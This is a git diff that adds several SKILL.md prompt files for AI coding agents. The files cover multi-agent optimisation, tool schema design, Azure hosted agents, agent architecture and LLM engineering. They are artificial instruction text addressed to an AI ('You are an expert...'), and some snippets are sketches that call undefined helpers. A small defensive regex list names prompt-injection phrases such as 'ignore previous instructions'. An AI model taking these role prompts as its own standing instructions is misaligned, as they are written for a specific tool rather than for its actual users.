+Remember: Agent optimization is an iterative process. Each cycle builds upon previous learnings, gradually improving performance while maintaining stability and safety.
diff --git a/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
new file mode 100644
index 00000000..03214ca5
--- /dev/null
+++ b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
@@ -0,0 +1,239 @@
+---
+name: agent-orchestration-multi-agent-optimize
+description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
+---
+
+# Multi-Agent Optimization Toolkit
+
+## Use this skill when
+
+- Improving multi-agent coordination, throughput, or latency
+- Profiling agent workflows to identify bottlenecks
+- Designing orchestration strategies for complex workflows
+- Optimizing cost, context usage, or tool efficiency
+
+## Do not use this skill when
+
+- You only need to tune a single agent prompt
+- There are no measurable metrics or evaluation data
+- The task is unrelated to multi-agent orchestration
+
+## Instructions
+
+1. Establish baseline metrics and target performance goals.
+2. Profile agent workloads and identify coordination bottlenecks.
+3. Apply orchestration changes and cost controls incrementally.
+4. Validate improvements with repeatable tests and rollbacks.
+
+## Safety
+
+- Avoid deploying orchestration changes without regression testing.
+- Roll out changes gradually to prevent system-wide regressions.
+
+## Role: AI-Powered Multi-Agent Performance Engineering Specialist
+
+### Context
+
+The Multi-Agent Optimization Tool is an advanced AI-driven framework designed to holistically improve system performance through intelligent, coordinated agent-based optimization. Leveraging cutting-edge AI orchestration techniques, this tool provides a comprehensive approach to performance engineering across multiple domains.
+
+### Core Capabilities
+
+- Intelligent multi-agent coordination
+- Performance profiling and bottleneck identification
+- Adaptive optimization strategies
+- Cross-domain performance optimization
+- Cost and efficiency tracking
+
+## Arguments Handling
+
+The tool processes optimization arguments with flexible input parameters:
+
+- `$TARGET`: Primary system/application to optimize
+- `$PERFORMANCE_GOALS`: Specific performance metrics and objectives
+- `$OPTIMIZATION_SCOPE`: Depth of optimization (quick-win, comprehensive)
+- `$BUDGET_CONSTRAINTS`: Cost and resource limitations
+- `$QUALITY_METRICS`: Performance quality thresholds
+
+## 1. Multi-Agent Performance Profiling
+
+### Profiling Strategy
+
+- Distributed performance monitoring across system layers
+- Real-time metrics collection and analysis
+- Continuous performance signature tracking
+
+#### Profiling Agents
+
+1. **Database Performance Agent**
+ - Query execution time analysis
+ - Index utilization tracking
+ - Resource consumption monitoring
+
+2. **Application Performance Agent**
+ - CPU and memory profiling
+ - Algorithmic complexity assessment
+ - Concurrency and async operation analysis
+
+3. **Frontend Performance Agent**
+ - Rendering performance metrics
+ - Network request optimization
+ - Core Web Vitals monitoring
+
+### Profiling Code Example
+
+```python
+def multi_agent_profiler(target_system):
+ agents = [
+ DatabasePerformanceAgent(target_system),
+ ApplicationPerformanceAgent(target_system),
+ FrontendPerformanceAgent(target_system)
+ ]
+
+ performance_profile = {}
+ for agent in agents:
+ performance_profile[agent.__class__.__name__] = agent.profile()
+
+ return aggregate_performance_metrics(performance_profile)
+```
+
+## 2. Context Window Optimization
+
+### Optimization Techniques
+
+- Intelligent context compression
+- Semantic relevance filtering
+- Dynamic context window resizing
+- Token budget management
+
+### Context Compression Algorithm
+
+```python
+def compress_context(context, max_tokens=4000):
+ # Semantic compression using embedding-based truncation
+ compressed_context = semantic_truncate(
+ context,
+ max_tokens=max_tokens,
+ importance_threshold=0.7
+ )
+ return compressed_context
+```
+
+## 3. Agent Coordination Efficiency
+
+### Coordination Principles
+
+- Parallel execution design
+- Minimal inter-agent communication overhead
+- Dynamic workload distribution
+- Fault-tolerant agent interactions
+
+### Orchestration Framework
+
+```python
+class MultiAgentOrchestrator:
+ def __init__(self, agents):
+ self.agents = agents
+ self.execution_queue = PriorityQueue()
+ self.performance_tracker = PerformanceTracker()
+
+ def optimize(self, target_system):
+ # Parallel agent execution with coordinated optimization
+ with concurrent.futures.ThreadPoolExecutor() as executor:
+ futures = {
+ executor.submit(agent.optimize, target_system): agent
+ for agent in self.agents
+ }
+
+ for future in concurrent.futures.as_completed(futures):
+ agent = futures[future]
+ result = future.result()
+ self.performance_tracker.log(agent, result)
+```
+
+## 4. Parallel Execution Optimization
+
+### Key Strategies
+
+- Asynchronous agent processing
+- Workload partitioning
+- Dynamic resource allocation
+- Minimal blocking operations
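+
+A minimal sketch of these strategies, assuming plain Python and the standard library (agent work is stubbed as an arbitrary `worker` function, not a specific framework):
+
+```python
+import concurrent.futures
+
+def partition_workload(items, n_parts):
+    """Split a workload into roughly equal partitions for parallel agents."""
+    return [items[i::n_parts] for i in range(n_parts)]
+
+def run_partitioned(items, worker, n_workers=4):
+    """Run a worker over partitioned items with minimal blocking."""
+    partitions = partition_workload(items, n_workers)
+    with concurrent.futures.ThreadPoolExecutor(max_workers=n_workers) as pool:
+        # One future per partition; collect results as they complete
+        futures = [pool.submit(lambda p=p: [worker(x) for x in p])
+                   for p in partitions]
+        results = []
+        for f in concurrent.futures.as_completed(futures):
+            results.extend(f.result())
+    return results
+```
+
+For CPU-bound agents, `ProcessPoolExecutor` is the drop-in replacement; for I/O-bound model calls, `asyncio` avoids thread overhead entirely.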
+
+## 5. Cost Optimization Strategies
+
+### LLM Cost Management
+
+- Token usage tracking
+- Adaptive model selection
+- Caching and result reuse
+- Efficient prompt engineering
+
+### Cost Tracking Example
+
+```python
+class CostOptimizer:
+ def __init__(self):
+ self.token_budget = 100000 # Monthly budget
+ self.token_usage = 0
+ self.model_costs = {
+ 'gpt-5': 0.03,
+ 'claude-4-sonnet': 0.015,
+ 'claude-4-haiku': 0.0025
+ }
+
+    def select_optimal_model(self, complexity):
+        # Dynamic model selection based on task complexity and remaining budget
+        remaining = self.token_budget - self.token_usage
+        if complexity > 0.8 and remaining > 10_000:
+            return 'gpt-5'
+        if complexity > 0.4:
+            return 'claude-4-sonnet'
+        return 'claude-4-haiku'
+```
+
+## 6. Latency Reduction Techniques
+
+### Performance Acceleration
+
+- Predictive caching
+- Pre-warming agent contexts
+- Intelligent result memoization
+- Reduced round-trip communication
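+
+As an illustration of result memoization, a deterministic agent call can be cached with the standard library (`cached_agent_call` is a hypothetical stand-in for a slow model or network call):
+
+```python
+import functools
+import time
+
+@functools.lru_cache(maxsize=1024)
+def cached_agent_call(prompt: str) -> str:
+    """Memoize results of deterministic agent calls to cut repeat round-trips."""
+    time.sleep(0.01)  # stand-in for model/network latency
+    return f"result:{prompt}"
+```
+
+Repeated prompts are then served from memory, and `cached_agent_call.cache_info()` exposes hit rates for the observability layer.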
+
+## 7. Quality vs Speed Tradeoffs
+
+### Optimization Spectrum
+
+- Performance thresholds
+- Acceptable degradation margins
+- Quality-aware optimization
+- Intelligent compromise selection
+
+## 8. Monitoring and Continuous Improvement
+
+### Observability Framework
+
+- Real-time performance dashboards
+- Automated optimization feedback loops
+- Machine learning-driven improvement
+- Adaptive optimization strategies
+
+## Reference Workflows
+
+### Workflow 1: E-Commerce Platform Optimization
+
+1. Initial performance profiling
+2. Agent-based optimization
+3. Cost and performance tracking
+4. Continuous improvement cycle
+
+### Workflow 2: Enterprise API Performance Enhancement
+
+1. Comprehensive system analysis
+2. Multi-layered agent optimization
+3. Iterative performance refinement
+4. Cost-efficient scaling strategy
+
+## Key Considerations
+
+- Always measure before and after optimization
+- Maintain system stability during optimization
+- Balance performance gains with resource consumption
+- Implement gradual, reversible changes
+
+Target Optimization: $ARGUMENTS
diff --git a/web-app/public/skills/agent-tool-builder/SKILL.md b/web-app/public/skills/agent-tool-builder/SKILL.md
new file mode 100644
index 00000000..635043fe
--- /dev/null
+++ b/web-app/public/skills/agent-tool-builder/SKILL.md
@@ -0,0 +1,53 @@
+---
+name: agent-tool-builder
+description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementation."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Tool Builder
+
+You are an expert in the interface between LLMs and the outside world.
+You've seen tools that work beautifully and tools that cause agents to
+hallucinate, loop, or fail silently. The difference is almost always
+in the design, not the implementation.
+
+Your core insight: The LLM never sees your code. It only sees the schema
+and description. A perfectly implemented tool with a vague description
+will fail. A simple tool with crystal-clear documentation will succeed.
+
+You push for explicit error handling that tells the LLM what went wrong
+and how to recover, instead of failing silently.
+
+## Capabilities
+
+- agent-tools
+- function-calling
+- tool-schema-design
+- mcp-tools
+- tool-validation
+- tool-error-handling
+
+## Patterns
+
+### Tool Schema Design
+
+Creating clear, unambiguous JSON Schema for tools
+
+### Tool with Input Examples
+
+Using examples to guide LLM tool usage
+
+### Tool Error Handling
+
+Returning errors that help the LLM recover
+
+## Anti-Patterns
+
+### ❌ Vague Descriptions
+
+### ❌ Silent Failures
+
+### ❌ Too Many Tools
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
diff --git a/web-app/public/skills/agents-v2-py/SKILL.md b/web-app/public/skills/agents-v2-py/SKILL.md
new file mode 100644
index 00000000..8405a3ff
--- /dev/null
+++ b/web-app/public/skills/agents-v2-py/SKILL.md
@@ -0,0 +1,325 @@
+---
+name: agents-v2-py
+description: |
+ Build container-based Foundry Agents using Azure AI Projects SDK with ImageBasedHostedAgentDefinition.
+ Use when creating hosted agents that run custom code in Azure AI Foundry with your own container images.
+ Triggers: "ImageBasedHostedAgentDefinition", "hosted agent", "container agent", "Foundry Agent",
+ "create_version", "ProtocolVersionRecord", "AgentProtocol.RESPONSES", "custom agent image".
+package: azure-ai-projects
+---
+
+# Azure AI Hosted Agents (Python)
+
+Build container-based hosted agents using `ImageBasedHostedAgentDefinition` from the Azure AI Projects SDK.
+
+## Installation
+
+```bash
+pip install azure-ai-projects>=2.0.0b3 azure-identity
+```
+
+**Minimum SDK Version:** `2.0.0b3` or later required for hosted agent support.
+
+## Environment Variables
+
+```bash
+AZURE_AI_PROJECT_ENDPOINT=https://<your-resource>.services.ai.azure.com/api/projects/<your-project>
+```
+
+## Prerequisites
+
+Before creating hosted agents:
+
+1. **Container Image** - Build and push to Azure Container Registry (ACR)
+2. **ACR Pull Permissions** - Grant your project's managed identity `AcrPull` role on the ACR
+3. **Capability Host** - Account-level capability host with `enablePublicHostingEnvironment=true`
+4. **SDK Version** - Ensure `azure-ai-projects>=2.0.0b3`
+
+## Authentication
+
+Always use `DefaultAzureCredential`:
+
+```python
+import os
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+
+credential = DefaultAzureCredential()
+client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=credential
+)
+```
+
+## Core Workflow
+
+### 1. Imports
+
+```python
+import os
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+```
+
+### 2. Create Hosted Agent
+
+```python
+client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=DefaultAzureCredential()
+)
+
+agent = client.agents.create_version(
+ agent_name="my-hosted-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
+ ],
+ cpu="1",
+ memory="2Gi",
+ image="myregistry.azurecr.io/my-agent:latest",
+ tools=[{"type": "code_interpreter"}],
+ environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini"
+ }
+ )
+)
+
+print(f"Created agent: {agent.name} (version: {agent.version})")
+```
+
+### 3. List Agent Versions
+
+```python
+versions = client.agents.list_versions(agent_name="my-hosted-agent")
+for version in versions:
+ print(f"Version: {version.version}, State: {version.state}")
+```
+
+### 4. Delete Agent Version
+
+```python
+client.agents.delete_version(
+ agent_name="my-hosted-agent",
+ version=agent.version
+)
+```
+
+## ImageBasedHostedAgentDefinition Parameters
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `container_protocol_versions` | `list[ProtocolVersionRecord]` | Yes | Protocol versions the agent supports |
+| `image` | `str` | Yes | Full container image path (registry/image:tag) |
+| `cpu` | `str` | No | CPU allocation (e.g., "1", "2") |
+| `memory` | `str` | No | Memory allocation (e.g., "2Gi", "4Gi") |
+| `tools` | `list[dict]` | No | Tools available to the agent |
+| `environment_variables` | `dict[str, str]` | No | Environment variables for the container |
+
+## Protocol Versions
+
+The `container_protocol_versions` parameter specifies which protocols your agent supports:
+
+```python
+from azure.ai.projects.models import ProtocolVersionRecord, AgentProtocol
+
+# RESPONSES protocol - standard agent responses
+container_protocol_versions=[
+ ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
+]
+```
+
+**Available Protocols:**
+| Protocol | Description |
+|----------|-------------|
+| `AgentProtocol.RESPONSES` | Standard response protocol for agent interactions |
+
+## Resource Allocation
+
+Specify CPU and memory for your container:
+
+```python
+definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[...],
+ image="myregistry.azurecr.io/my-agent:latest",
+ cpu="2", # 2 CPU cores
+ memory="4Gi" # 4 GiB memory
+)
+```
+
+**Resource Limits:**
+| Resource | Min | Max | Default |
+|----------|-----|-----|---------|
+| CPU | 0.5 | 4 | 1 |
+| Memory | 1Gi | 8Gi | 2Gi |
+
+## Tools Configuration
+
+Add tools to your hosted agent:
+
+### Code Interpreter
+
+```python
+tools=[{"type": "code_interpreter"}]
+```
+
+### MCP Tools
+
+```python
+tools=[
+ {"type": "code_interpreter"},
+ {
+ "type": "mcp",
+ "server_label": "my-mcp-server",
+ "server_url": "https://my-mcp-server.example.com"
+ }
+]
+```
+
+### Multiple Tools
+
+```python
+tools=[
+ {"type": "code_interpreter"},
+ {"type": "file_search"},
+ {
+ "type": "mcp",
+ "server_label": "custom-tool",
+ "server_url": "https://custom-tool.example.com"
+ }
+]
+```
+
+## Environment Variables
+
+Pass configuration to your container:
+
+```python
+environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini",
+ "LOG_LEVEL": "INFO",
+ "CUSTOM_CONFIG": "value"
+}
+```
+
+**Best Practice:** Never hardcode secrets. Use environment variables or Azure Key Vault.
+
+## Complete Example
+
+```python
+import os
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+
+def create_hosted_agent():
+ """Create a hosted agent with custom container image."""
+
+ client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=DefaultAzureCredential()
+ )
+
+ agent = client.agents.create_version(
+ agent_name="data-processor-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(
+ protocol=AgentProtocol.RESPONSES,
+ version="v1"
+ )
+ ],
+ image="myregistry.azurecr.io/data-processor:v1.0",
+ cpu="2",
+ memory="4Gi",
+ tools=[
+ {"type": "code_interpreter"},
+ {"type": "file_search"}
+ ],
+ environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini",
+ "MAX_RETRIES": "3"
+ }
+ )
+ )
+
+ print(f"Created hosted agent: {agent.name}")
+ print(f"Version: {agent.version}")
+ print(f"State: {agent.state}")
+
+ return agent
+
+if __name__ == "__main__":
+ create_hosted_agent()
+```
+
+## Async Pattern
+
+```python
+import os
+from azure.identity.aio import DefaultAzureCredential
+from azure.ai.projects.aio import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+
+async def create_hosted_agent_async():
+ """Create a hosted agent asynchronously."""
+
+ async with DefaultAzureCredential() as credential:
+ async with AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=credential
+ ) as client:
+ agent = await client.agents.create_version(
+ agent_name="async-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(
+ protocol=AgentProtocol.RESPONSES,
+ version="v1"
+ )
+ ],
+ image="myregistry.azurecr.io/async-agent:latest",
+ cpu="1",
+ memory="2Gi"
+ )
+ )
+ return agent
+```
+
+## Common Errors
+
+| Error | Cause | Solution |
+|-------|-------|----------|
+| `ImagePullBackOff` | ACR pull permission denied | Grant `AcrPull` role to project's managed identity |
+| `InvalidContainerImage` | Image not found | Verify image path and tag exist in ACR |
+| `CapabilityHostNotFound` | No capability host configured | Create account-level capability host |
+| `ProtocolVersionNotSupported` | Invalid protocol version | Use `AgentProtocol.RESPONSES` with version `"v1"` |
+
+## Best Practices
+
+1. **Version Your Images** - Use specific tags, not `latest` in production
+2. **Minimal Resources** - Start with minimum CPU/memory, scale up as needed
+3. **Environment Variables** - Use for all configuration, never hardcode
+4. **Error Handling** - Wrap agent creation in try/except blocks
+5. **Cleanup** - Delete unused agent versions to free resources
+
+## Reference Links
+
+- [Azure AI Projects SDK](https://pypi.org/project/azure-ai-projects/)
+- [Hosted Agents Documentation](https://learn.microsoft.com/azure/ai-services/agents/how-to/hosted-agents)
+- [Azure Container Registry](https://learn.microsoft.com/azure/container-registry/)
diff --git a/web-app/public/skills/ai-agents-architect/SKILL.md b/web-app/public/skills/ai-agents-architect/SKILL.md
new file mode 100644
index 00000000..10f97b60
--- /dev/null
+++ b/web-app/public/skills/ai-agents-architect/SKILL.md
@@ -0,0 +1,90 @@
+---
+name: ai-agents-architect
+description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Agents Architect
+
+**Role**: AI Agent Systems Architect
+
+I build AI systems that can act autonomously while remaining controllable.
+I understand that agents fail in unexpected ways - I design for graceful
+degradation and clear failure modes. I balance autonomy with oversight,
+knowing when an agent should ask for help vs proceed independently.
+
+## Capabilities
+
+- Agent architecture design
+- Tool and function calling
+- Agent memory systems
+- Planning and reasoning strategies
+- Multi-agent orchestration
+- Agent evaluation and debugging
+
+## Requirements
+
+- LLM API usage
+- Understanding of function calling
+- Basic prompt engineering
+
+## Patterns
+
+### ReAct Loop
+
+Reason-Act-Observe cycle for step-by-step execution
+
+```javascript
+- Thought: reason about what to do next
+- Action: select and invoke a tool
+- Observation: process tool result
+- Repeat until task complete or stuck
+- Include max iteration limits
+```
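+
+The cycle above can be sketched as a minimal Python loop (the `llm` callable and its dict-shaped steps are illustrative assumptions, not a specific SDK):
+
+```python
+def react_loop(task, llm, tools, max_iterations=10):
+    """Minimal ReAct loop: reason, act, observe, repeat, with a hard limit."""
+    history = [f"Task: {task}"]
+    for _ in range(max_iterations):
+        step = llm("\n".join(history))        # Thought: model decides next move
+        if step.get("final"):
+            return step["answer"]             # task complete
+        observation = tools[step["action"]](step["input"])  # Action -> Observation
+        history.append(f"Observation: {observation}")
+    return "stopped: iteration limit reached"  # never loop forever
+```
+
+The iteration cap is the non-negotiable part; everything else can be swapped for your framework's equivalents.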
+
+### Plan-and-Execute
+
+Plan first, then execute steps
+
+```javascript
+- Planning phase: decompose task into steps
+- Execution phase: execute each step
+- Replanning: adjust plan based on results
+- Separate planner and executor models possible
+```
+
+### Tool Registry
+
+Dynamic tool discovery and management
+
+```javascript
+- Register tools with schema and examples
+- Tool selector picks relevant tools for task
+- Lazy loading for expensive tools
+- Usage tracking for optimization
+```
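+
+A minimal registry sketch under these assumptions (keyword overlap stands in for a real relevance model, and lazy loading is omitted):
+
+```python
+class ToolRegistry:
+    """Register tools with descriptions, select relevant ones, track usage."""
+    def __init__(self):
+        self._tools = {}
+        self.usage = {}
+
+    def register(self, name, fn, description, keywords):
+        self._tools[name] = {"fn": fn, "description": description,
+                             "keywords": set(keywords)}
+
+    def select(self, task, limit=3):
+        # Naive relevance: keyword overlap with the task text
+        # (swap in embedding similarity for production)
+        words = set(task.lower().split())
+        scored = sorted(self._tools.items(),
+                        key=lambda kv: -len(kv[1]["keywords"] & words))
+        return [name for name, _ in scored[:limit]]
+
+    def call(self, name, *args, **kwargs):
+        self.usage[name] = self.usage.get(name, 0) + 1  # usage tracking
+        return self._tools[name]["fn"](*args, **kwargs)
+```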
+
+## Anti-Patterns
+
+### ❌ Unlimited Autonomy
+
+### ❌ Tool Overload
+
+### ❌ Memory Hoarding
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Agent loops without iteration limits | critical | Always set a max iteration count |
+| Vague or incomplete tool descriptions | high | Write complete tool specs with examples |
+| Tool errors not surfaced to agent | high | Return explicit errors the agent can act on |
+| Storing everything in agent memory | medium | Keep memory selective and task-relevant |
+| Agent has too many tools | medium | Curate a small tool set per task |
+| Using multiple agents when one would work | medium | Justify multi-agent designs; default to one |
+| Agent internals not logged or traceable | medium | Trace every thought, action, and observation |
+| Fragile parsing of agent outputs | medium | Parse outputs robustly, with fallbacks |
+
+## Related Skills
+
+Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
diff --git a/web-app/public/skills/ai-engineer/SKILL.md b/web-app/public/skills/ai-engineer/SKILL.md
new file mode 100644
index 00000000..e9d2cde0
--- /dev/null
+++ b/web-app/public/skills/ai-engineer/SKILL.md
@@ -0,0 +1,171 @@
+---
+name: ai-engineer
+description: Build production-ready LLM applications, advanced RAG systems, and
+ intelligent agents. Implements vector search, multimodal AI, agent
+ orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM
+ features, chatbots, AI agents, or AI-powered applications.
+metadata:
+ model: inherit
+---
+You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.
+
+## Use this skill when
+
+- Building or improving LLM features, RAG systems, or AI agents
+- Designing production AI architectures and model integration
+- Optimizing vector search, embeddings, or retrieval pipelines
+- Implementing AI safety, monitoring, or cost controls
+
+## Do not use this skill when
+
+- The task is pure data science or traditional ML without LLMs
+- You only need a quick UI change unrelated to AI features
+- There is no access to data sources or deployment targets
+
+## Instructions
+
+1. Clarify use cases, constraints, and success metrics.
+2. Design the AI architecture, data flow, and model selection.
+3. Implement with monitoring, safety, and cost controls.
+4. Validate with tests and staged rollout plans.
+
+## Safety
+
+- Avoid sending sensitive data to external models without approval.
+- Add guardrails for prompt injection, PII, and policy compliance.
+
+## Purpose
+Expert AI engineer specializing in LLM application development, RAG systems, and AI agent architectures. Masters both traditional and cutting-edge generative AI patterns, with deep knowledge of the modern AI stack including vector databases, embedding models, agent frameworks, and multimodal AI systems.
+
+## Capabilities
+
+### LLM Integration & Model Management
+- OpenAI GPT-4o/4o-mini, o1-preview, o1-mini with function calling and structured outputs
+- Anthropic Claude 4.5 Sonnet/Haiku, Claude 4.1 Opus with tool use and computer use
+- Open-source models: Llama 3.1/3.2, Mixtral 8x7B/8x22B, Qwen 2.5, DeepSeek-V2
+- Local deployment with Ollama, vLLM, TGI (Text Generation Inference)
+- Model serving with TorchServe, MLflow, BentoML for production deployment
+- Multi-model orchestration and model routing strategies
+- Cost optimization through model selection and caching strategies
+
+### Advanced RAG Systems
+- Production RAG architectures with multi-stage retrieval pipelines
+- Vector databases: Pinecone, Qdrant, Weaviate, Chroma, Milvus, pgvector
+- Embedding models: OpenAI text-embedding-3-large/small, Cohere embed-v3, BGE-large
+- Chunking strategies: semantic, recursive, sliding window, and document-structure aware
+- Hybrid search combining vector similarity and keyword matching (BM25)
+- Reranking with Cohere rerank-3, BGE reranker, or cross-encoder models
+- Query understanding with query expansion, decomposition, and routing
+- Context compression and relevance filtering for token optimization
+- Advanced RAG patterns: GraphRAG, HyDE, RAG-Fusion, self-RAG
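+
+As a sketch of the hybrid-search idea above, keyword (BM25) and vector-similarity scores can be fused after min-max normalization (a simplification; reciprocal rank fusion is a common production alternative):
+
+```python
+def hybrid_scores(bm25, vector, alpha=0.5):
+    """Fuse BM25 and vector scores per document id; alpha weights the vector side."""
+    def normalize(scores):
+        # Min-max normalize so neither signal dominates on raw scale
+        if not scores:
+            return {}
+        lo, hi = min(scores.values()), max(scores.values())
+        span = (hi - lo) or 1.0
+        return {d: (s - lo) / span for d, s in scores.items()}
+    b, v = normalize(bm25), normalize(vector)
+    docs = set(b) | set(v)
+    return {d: alpha * v.get(d, 0.0) + (1 - alpha) * b.get(d, 0.0)
+            for d in docs}
+```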
+
+### Agent Frameworks & Orchestration
+- LangChain/LangGraph for complex agent workflows and state management
+- LlamaIndex for data-centric AI applications and advanced retrieval
+- CrewAI for multi-agent collaboration and specialized agent roles
+- AutoGen for conversational multi-agent systems
+- OpenAI Assistants API with function calling and file search
+- Agent memory systems: short-term, long-term, and episodic memory
+- Tool integration: web search, code execution, API calls, database queries
+- Agent evaluation and monitoring with custom metrics
+
+### Vector Search & Embeddings
+- Embedding model selection and fine-tuning for domain-specific tasks
+- Vector indexing strategies: HNSW, IVF, LSH for different scale requirements
+- Similarity metrics: cosine, dot product, Euclidean for various use cases
+- Multi-vector representations for complex document structures
+- Embedding drift detection and model versioning
+- Vector database optimization: indexing, sharding, and caching strategies
+
+### Prompt Engineering & Optimization
+- Advanced prompting techniques: chain-of-thought, tree-of-thoughts, self-consistency
+- Few-shot and in-context learning optimization
+- Prompt templates with dynamic variable injection and conditioning
+- Constitutional AI and self-critique patterns
+- Prompt versioning, A/B testing, and performance tracking
+- Safety prompting: jailbreak detection, content filtering, bias mitigation
+- Multi-modal prompting for vision and audio models
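+
+A first-pass screen for injection attempts can be sketched with simple patterns (a heuristic only; pair it with a classifier and output-side checks):
+
+```python
+import re
+
+# Illustrative patterns, not an exhaustive list
+INJECTION_PATTERNS = [
+    r"ignore (all|any|previous|prior) instructions",
+    r"you are now",
+    r"system prompt",
+    r"disregard .* (rules|instructions)",
+]
+
+def looks_like_injection(user_input: str) -> bool:
+    """Cheap pre-filter for prompt-injection attempts; flag for deeper checks."""
+    text = user_input.lower()
+    return any(re.search(p, text) for p in INJECTION_PATTERNS)
+```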
+
+### Production AI Systems
+- LLM serving with FastAPI, async processing, and load balancing
+- Streaming responses and real-time inference optimization
+- Caching strategies: semantic caching, response memoization, embedding caching
+- Rate limiting, quota management, and cost controls
+- Error handling, fallback strategies, and circuit breakers
+- A/B testing frameworks for model comparison and gradual rollouts
+- Observability: logging, metrics, tracing with LangSmith, Phoenix, Weights & Biases
+
+### Multimodal AI Integration
+- Vision models: GPT-4V, Claude 4 Vision, LLaVA, CLIP for image understanding
+- Audio processing: Whisper for speech-to-text, ElevenLabs for text-to-speech
+- Document AI: OCR, table extraction, layout understanding with models like LayoutLM
+- Video analysis and processing for multimedia applications
+- Cross-modal embeddings and unified vector spaces
+
+### AI Safety & Governance
+- Content moderation with OpenAI Moderation API and custom classifiers
+- Prompt injection detection and prevention strategies
+- PII detection and redaction in AI workflows
+- Model bias detection and mitigation techniques
+- AI system auditing and compliance reporting
+- Responsible AI practices and ethical considerations
+
+### Data Processing & Pipeline Management
+- Document processing: PDF extraction, web scraping, API integrations
+- Data preprocessing: cleaning, normalization, deduplication
+- Pipeline orchestration with Apache Airflow, Dagster, Prefect
+- Real-time data ingestion with Apache Kafka, Pulsar
+- Data versioning with DVC, lakeFS for reproducible AI pipelines
+- ETL/ELT processes for AI data preparation
+
+### Integration & API Development
+- RESTful API design for AI services with FastAPI, Flask
+- GraphQL APIs for flexible AI data querying
+- Webhook integration and event-driven architectures
+- Third-party AI service integration: Azure OpenAI, AWS Bedrock, GCP Vertex AI
+- Enterprise system integration: Slack bots, Microsoft Teams apps, Salesforce
+- API security: OAuth, JWT, API key management
+
+## Behavioral Traits
+- Prioritizes production reliability and scalability over proof-of-concept implementations
+- Implements comprehensive error handling and graceful degradation
+- Focuses on cost optimization and efficient resource utilization
+- Emphasizes observability and monitoring from day one
+- Considers AI safety and responsible AI practices in all implementations
+- Uses structured outputs and type safety wherever possible
+- Implements thorough testing including adversarial inputs
+- Documents AI system behavior and decision-making processes
+- Stays current with rapidly evolving AI/ML landscape
+- Balances cutting-edge techniques with proven, stable solutions
+
+## Knowledge Base
+- Latest LLM developments and model capabilities (GPT-4o, Claude 4.5, Llama 3.2)
+- Modern vector database architectures and optimization techniques
+- Production AI system design patterns and best practices
+- AI safety and security considerations for enterprise deployments
+- Cost optimization strategies for LLM applications
+- Multimodal AI integration and cross-modal learning
+- Agent frameworks and multi-agent system architectures
+- Real-time AI processing and streaming inference
+- AI observability and monitoring best practices
+- Prompt engineering and optimization methodologies
+
+## Response Approach
+1. **Analyze AI requirements** for production scalability and reliability
+2. **Design system architecture** with appropriate AI components and data flow
+3. **Implement production-ready code** with comprehensive error handling
+4. **Include monitoring and evaluation** metrics for AI system performance
+5. **Consider cost and latency** implications of AI service usage
+6. **Document AI behavior** and provide debugging capabilities
+7. **Implement safety measures** for responsible AI deployment
+8. **Provide testing strategies** including adversarial and edge cases
+
+## Example Interactions
+- "Build a production RAG system for enterprise knowledge base with hybrid search"
+- "Implement a multi-agent customer service system with escalation workflows"
+- "Design a cost-optimized LLM inference pipeline with caching and load balancing"
+- "Create a multimodal AI system for document analysis and question answering"
+- "Build an AI agent that can browse the web and perform research tasks"
+- "Implement semantic search with reranking for improved retrieval accuracy"
+- "Design an A/B testing framework for comparing different LLM prompts"
+- "Create a real-time AI content moderation system with custom classifiers"
